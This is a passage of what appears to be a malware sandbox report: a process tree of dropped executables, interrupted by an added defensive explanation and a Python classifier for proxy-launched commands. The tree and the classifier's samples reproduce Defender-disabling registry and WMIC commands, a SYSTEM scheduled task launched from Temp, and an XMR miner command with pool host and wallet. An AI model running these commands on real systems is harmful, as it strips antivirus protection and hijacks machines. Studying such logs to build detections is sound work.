    • Command and Scripting Interpreter: PowerShell
    PID:3436
  • C:\Users\Admin\Pictures\4qr8a7wdg8ZGAzWBvkAFxqAb.exe
    "C:\Users\Admin\Pictures\4qr8a7wdg8ZGAzWBvkAFxqAb.exe"
    10⤵
    PID:4488
• C:\Users\Admin\Pictures\yFx4uQIoSXu0m1gDbyX2hsHV.exe
  "C:\Users\Admin\Pictures\yFx4uQIoSXu0m1gDbyX2hsHV.exe"
  9⤵
  • Executes dropped EXE
  PID:952
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    10⤵
    • Command and Scripting Interpreter: PowerShell
    PID:2964
  • C:\Users\Admin\Pictures\yFx4uQIoSXu0m1gDbyX2hsHV.exe
    "C:\Users\Admin\Pictures\yFx4uQIoSXu0m1gDbyX2hsHV.exe"
    10⤵
    PID:5952
• C:\Users\Admin\Pictures\U8vf8rJTmNNPcAyfafgEXsK8.exe
  "C:\Users\Admin\Pictures\U8vf8rJTmNNPcAyfafgEXsK8.exe"
  9⤵
  • Executes dropped EXE
  PID:1448
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    10⤵
    • Command and Scripting Interpreter: PowerShell
    PID:2288
  • C:\Users\Admin\Pictures\U8vf8rJTmNNPcAyfafgEXsK8.exe
    "C:\Users\Admin\Pictures\U8vf8rJTmNNPcAyfafgEXsK8.exe"
    10⤵
    PID:5204
• C:\Users\Admin\Pictures\YPvckKCypmBOW0NpRBKcRmjU.exe
  "C:\Users\Admin\Pictures\YPvckKCypmBOW0NpRBKcRmjU.exe"
  9⤵
  • Modifies firewall policy service
  • Executes dropped EXE
  • Drops file in System32 directory
  PID:1728
• C:\Users\Admin\Pictures\9hs3wfYjijM3ppotMilPLHzJ.exe
  "C:\Users\Admin\Pictures\9hs3wfYjijM3ppotMilPLHzJ.exe"
  9⤵
  • Executes dropped EXE
  PID:2708
  • C:\Users\Admin\AppData\Local\Temp\7zS3F51.tmp\Install.exe
    .\Install.exe /tEdidDDf "385118" /S
    10⤵
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Enumerates system info in registry
    PID:3892
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      11⤵
      PID:1332
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        12⤵
        PID:4448
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
          13⤵
          PID:2172
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            14⤵
            PID:2908
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        12⤵
        PID:1492
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
          13⤵
          PID:2772
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
            14⤵
            PID:2852
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        12⤵
        PID:2348
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
          13⤵
          PID:1124
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
            14⤵
            PID:4964
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        12⤵
        PID:4480
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
          13⤵
          PID:2236
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
            14⤵
            PID:3032
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        12⤵
        PID:4568
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
          13⤵
          PID:3872
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell start-process -WindowStyle Hidden gpupdate.exe /force
            14⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2200
            • C:\Windows\SysWOW64\gpupdate.exe
              "C:\Windows\system32\gpupdate.exe" /force
              15⤵
              PID:3644
    • C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
      11⤵
      PID:2080
      • C:\Windows\SysWOW64\cmd.exe
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        PID:5072
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
          13⤵
          • Command and Scripting Interpreter: PowerShell
          PID:4488
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            14⤵
            PID:5580
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS3F51.tmp\Install.exe\" it /WWMdidCFzX 385118 /S" /V1 /F
      11⤵
      • Creates scheduled task(s)
      PID:5596
    • C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
      11⤵
      PID:5988
      • C:\Windows\SysWOW64\cmd.exe
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        12⤵
        PID:6112
        • \??\c:\windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
          13⤵
          PID:5436
• C:\Users\Admin\Pictures\jbN5ulvXWgLaRW8vEeYfydH2.exe
  "C:\Users\Admin\Pictures\jbN5ulvXWgLaRW8vEeYfydH2.exe"
  9⤵
  • Executes dropped EXE
  PID:3156
  • C:\Users\Admin\AppData\Local\Temp\7zS4F01.tmp\Install.exe
    .\Install.exe /tEdidDDf "385118" /S
    10⤵
    • Executes dropped EXE
    PID:5088
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      11⤵
      PID:2332
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        12⤵
        PID:3192
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
          13⤵
          PID:916
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            14⤵
            PID:4620
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        12⤵
        PID:2172
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
          13⤵
          PID:1492
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
            14⤵
            PID:3872
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        12⤵
        PID:5416
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
          13⤵
          PID:5436
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
            14⤵
            PID:5452
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        12⤵
        PID:5676
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
          13⤵
          PID:5800
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
            14⤵
            PID:5996
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        12⤵
        PID:4356
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
          13⤵
          PID:5352
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                        14⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:5596
                                                                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                          15⤵
                                                                                                                                                            PID:5636
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:5720
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                        12⤵
                                                                                                                                                          PID:5872
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                            13⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5920
                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                              14⤵
                                                                                                                                                                PID:6008
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4F01.tmp\Install.exe\" it /DXFdidLDYA 385118 /S" /V1 /F
                                                                                                                                                          11⤵
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:5396
                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                          11⤵
                                                                                                                                                            PID:5564
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                              12⤵
                                                                                                                                                                PID:5900
                                                                                                                                                                • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:6128
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:3552
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:2608
                                                                                                                                                • C:\Users\Admin\1000006002\794bca3438.exe
                                                                                                                                                  "C:\Users\Admin\1000006002\794bca3438.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  PID:4436
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2652 -ip 2652
                                                                                                                                              1⤵
                                                                                                                                                PID:1524
                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3444
                                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:796
                                                                                                                                                  • C:\Windows\Temp\368918.exe
                                                                                                                                                    "C:\Windows\Temp\368918.exe" --list-devices
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:1204
                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3424
                                                                                                                                                • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4332
                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4700
                                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  PID:1068
                                                                                                                                                  • C:\Windows\Temp\910402.exe
                                                                                                                                                    "C:\Windows\Temp\910402.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    PID:884
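The defense-evasion chain above is worth reading closely: `forfiles` is not a file-management step here, it is a proxy launcher. With `/m waitfor.exe`, `/m help.exe` or `/m where.exe` it matches exactly one file in `system32`, so the `/c` command runs once, and each hop (forfiles, then cmd, then powershell, then reg/WMIC/gpupdate) gets a fresh, benign-looking parent. The innermost commands are the point: the `reg add` sets the default action for Defender threat ID 2147812831 to `6`, which in the `ThreatIDDefaultAction` policy means Allow; the `WMIC ... MSFT_MpPreference call Add ExclusionExtension=exe` call excludes every `.exe` from scanning; `gpupdate /force` applies the new policy; and the `schtasks /CREATE ... /RU "SYSTEM"` task re-launches the dropper from `%TEMP%` as SYSTEM. The following is an added example, not part of the sandbox report or the malware: it peels the proxy layers off a command line and tags what the innermost command does. The sample command lines are copied from the tree above (with a `WerFault` line as a benign control); the tag names and function names are this example's own.

```python
"""Peel forfiles -> cmd -> powershell proxy layers off a Windows command line
and tag what the innermost command does. Added example; sample inputs are copied
from the sandbox process tree, tag and function names are our own."""
import re

# Command lines taken from the process tree (constructed test set; the WerFault
# entry is the benign control).
SAMPLES = {
    "threat_allow": r'forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"',
    "gpupdate": r'forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"',
    "exclusion": r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"',
    "schtask": r'schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4F01.tmp\Install.exe\" it /DXFdidLDYA 385118 /S" /V1 /F',
    "miner": r'"C:\Windows\Temp\910402.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x',
    "benign": r'C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2652 -ip 2652',
}

ALLOW = 6  # ThreatIDDefaultAction value that means "Allow" (do not act on the threat)


def _exe(name):
    """Regex for an executable name with optional quotes and drive-path prefix."""
    return r'"?(?:[A-Za-z]:\\[^"\s]*\\)?' + name + r'(?:\.exe)?"?'


# Proxy layers. forfiles runs its /c argument once per matched file; inner quotes
# are escaped as \" on the forfiles command line and unescaped by the time cmd runs.
FORFILES_RE = re.compile(r'^' + _exe('forfiles') + r'\s.*?\s/c\s+"(?P<inner>.*)"\s*$', re.I)
CMD_RE = re.compile(r'^(?:' + _exe('cmd') + r'\s+)?/[ck]\s+(?P<inner>.*)$', re.I)
PS_RE = re.compile(r'^' + _exe('powershell') + r'\s+(?P<inner>.*)$', re.I)
HIDDEN_RE = re.compile(r'-w(?:indowstyle)?\s+hidden\b', re.I)
STARTPS_RE = re.compile(r'^start-process\s+', re.I)

# Innermost-command signatures.
THREAT_ACTION_RE = re.compile(
    r'reg(?:\.exe)?"?\s+add\s+"?HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender'
    r'\\Threats\\ThreatIDDefaultAction"?(?=.*\s/v\s+(?P<tid>\d+))(?=.*\s/d\s+(?P<action>\d+))', re.I)
EXCLUSION_RE = re.compile(r'MSFT_MpPreference\s+call\s+Add\s+Exclusion\w+=|Add-MpPreference\s+.*-Exclusion\w+', re.I)
SCHTASKS_CREATE_RE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b', re.I)
SCHTASKS_RU_SYSTEM_RE = re.compile(r'/ru\s+"?system"?', re.I)
SCHTASKS_TR_RE = re.compile(r'/tr\s+"(?P<task>.*)"', re.I)  # greedy: /TR payload may itself contain quotes
POOL_RE = re.compile(r'(?:^|\s)-o\s+[\w.\-]+:\d{2,5}\b')      # -o pool.host:port
WALLET_RE = re.compile(r'(?:^|\s)-u\s+\S{20,}')              # -u <long wallet string>
COIN_RE = re.compile(r'--coin\s+\w+', re.I)
GPUPDATE_RE = re.compile(r'gpupdate(?:\.exe)?"?\s+/force\b', re.I)


def unwrap(cmdline):
    """Strip proxy layers. Returns (layers, innermost_command, hidden_window)."""
    layers, hidden, cur = [], False, cmdline.strip()
    while True:
        m = FORFILES_RE.match(cur)
        if m:
            layers.append("forfiles")
            cur = m.group("inner").replace('\\"', '"').strip()
            continue
        m = CMD_RE.match(cur)
        if m:
            layers.append("cmd")
            cur = m.group("inner").strip()
            continue
        m = PS_RE.match(cur)
        if m:
            layers.append("powershell")
            cur = m.group("inner")
            if HIDDEN_RE.search(cur):
                hidden = True
                cur = HIDDEN_RE.sub("", cur)
            cur = STARTPS_RE.sub("", cur.strip()).strip()
            continue
        return layers, cur, hidden


def classify(cmdline):
    """Return {'layers': [...], 'command': innermost, 'tags': sorted tag list}."""
    layers, inner, hidden = unwrap(cmdline)
    tags = set()
    if "forfiles" in layers:
        tags.add("forfiles-proxy-exec")
    if hidden:
        tags.add("hidden-window")
    m = THREAT_ACTION_RE.search(inner)
    if m:
        tags.add("defender-threat-action-allow" if int(m.group("action")) == ALLOW
                 else "defender-threat-action-set")
    if EXCLUSION_RE.search(inner):
        tags.add("defender-exclusion-added")
    if SCHTASKS_CREATE_RE.search(inner):
        tr = SCHTASKS_TR_RE.search(inner)
        if SCHTASKS_RU_SYSTEM_RE.search(inner) and tr and "\\temp\\" in tr.group("task").lower():
            tags.add("schtask-system-from-temp")
        else:
            tags.add("schtask-create")
    if (POOL_RE.search(inner) and WALLET_RE.search(inner)) or COIN_RE.search(inner):
        tags.add("xmr-miner-cmdline")
    if GPUPDATE_RE.search(inner):
        tags.add("gpupdate-force")
    return {"layers": layers, "command": inner, "tags": sorted(tags)}


def scan(samples=SAMPLES):
    """Classify every sample; returns {name: sorted tag list}."""
    return {name: classify(cmd)["tags"] for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, tags in scan().items():
        print(f"{name:13} {', '.join(tags) or '-'}")
```

The classifier works on the innermost command precisely because that is what the proxy chain is designed to hide: a rule that only looks at `reg.exe`'s direct parent sees `cmd.exe`, and one that only looks at `forfiles.exe` sees a system utility with a `system32` path argument. In telemetry, the same logic should be applied to the full command line of each process in the tree, and a `forfiles`/`cmd`/`powershell` chain ending in a Defender policy write or exclusion is a strong signal on its own.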
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                1⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:5052
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                1⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:1244
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4464 -ip 4464
                                                                                                                                                1⤵
                                                                                                                                                  PID:4580
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4464 -ip 4464
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3060
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1340
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                      1⤵
                                                                                                                                                        PID:908
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:856
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
